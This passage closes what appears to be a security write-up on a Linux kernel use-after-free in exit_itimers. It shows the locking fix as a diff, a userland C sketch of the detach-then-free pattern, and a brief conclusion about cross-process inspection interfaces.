+ * modify the signal->posix_timers list. Yet we need sighand->siglock
+ * to prevent the race with /proc/pid/timers.
  */
-void exit_itimers(struct signal_struct *sig)
+void exit_itimers(struct task_struct *tsk)
 {
+       struct list_head timers;
        struct k_itimer *tmr;
 
-       while (!list_empty(&sig->posix_timers)) {
-               tmr = list_entry(sig->posix_timers.next, struct k_itimer, list);
+       if (list_empty(&tsk->signal->posix_timers))
+               return;
+
+       spin_lock_irq(&tsk->sighand->siglock);
+       list_replace_init(&tsk->signal->posix_timers, &timers);
+       spin_unlock_irq(&tsk->sighand->siglock);
+
+       while (!list_empty(&timers)) {
+               tmr = list_first_entry(&timers, struct k_itimer, list);
                itimer_delete(tmr);
        }
 }
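The same detach-then-free pattern can be sketched in userland, with a pthread mutex standing in for sighand->siglock. This is an illustration under my own assumptions rather than the kernel code: `demo_siglock`, `struct demo_timer` and the `demo_*` helpers are hypothetical names.

```c
#include <pthread.h>
#include <stdlib.h>

struct demo_list {
    struct demo_list *next, *prev;
};

/* Hypothetical timer record; the link is the first member on purpose. */
struct demo_timer {
    struct demo_list list;
    int id;
};

/* Plays the role of sighand->siglock in this sketch. */
static pthread_mutex_t demo_siglock = PTHREAD_MUTEX_INITIALIZER;

static void demo_list_init(struct demo_list *h)
{
    h->next = h->prev = h;
}

static void demo_list_add_tail(struct demo_list *n, struct demo_list *h)
{
    n->prev = h->prev;
    n->next = h;
    h->prev->next = n;
    h->prev = n;
}

static void demo_list_del(struct demo_list *e)
{
    e->prev->next = e->next;
    e->next->prev = e->prev;
    e->next = e->prev = NULL;
}

/* Hand every entry of 'old' over to 'fresh' and leave 'old' empty. */
static void demo_list_replace_init(struct demo_list *old,
                                   struct demo_list *fresh)
{
    fresh->next = old->next;
    fresh->next->prev = fresh;
    fresh->prev = old->prev;
    fresh->prev->next = fresh;
    demo_list_init(old);
}

/* Register a timer on the shared list, under the lock. */
static int demo_timer_add(struct demo_list *shared, int id)
{
    struct demo_timer *t = malloc(sizeof(*t));

    if (!t)
        return -1;
    t->id = id;
    pthread_mutex_lock(&demo_siglock);
    demo_list_add_tail(&t->list, shared);
    pthread_mutex_unlock(&demo_siglock);
    return 0;
}

/* Detach the shared list under the lock, then free the entries without it.
 * Returns the number of timers freed. */
static int demo_exit_itimers(struct demo_list *shared)
{
    struct demo_list private_list;
    int freed = 0;

    pthread_mutex_lock(&demo_siglock);
    demo_list_replace_init(shared, &private_list);
    pthread_mutex_unlock(&demo_siglock);

    while (private_list.next != &private_list) {
        /* Valid cast because 'list' is the first member of demo_timer. */
        struct demo_timer *t = (struct demo_timer *)private_list.next;

        demo_list_del(&t->list);
        free(t);
        freed++;
    }
    return freed;
}
```

A reader that takes the same lock sees either the full list or an empty one, never an entry that is halfway through being freed, and the freeing itself happens with the lock released.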

Conclusion

Not every use-after-free turns into something interesting. Many do, and given how widely deployed this code is, it's a bit of a shame this one didn't: it would have made for an interesting investigation.

A lesson we can take away from here is that cross-process inspection tools — be they kernel syscalls or filesystem abstractions or anything else — are interesting ways to create unexpected paths to data that should be inaccessible. All it takes is for one obscure path to be exposed and a lot of code that would otherwise be sound is suddenly an interesting toy for an attacker to play with.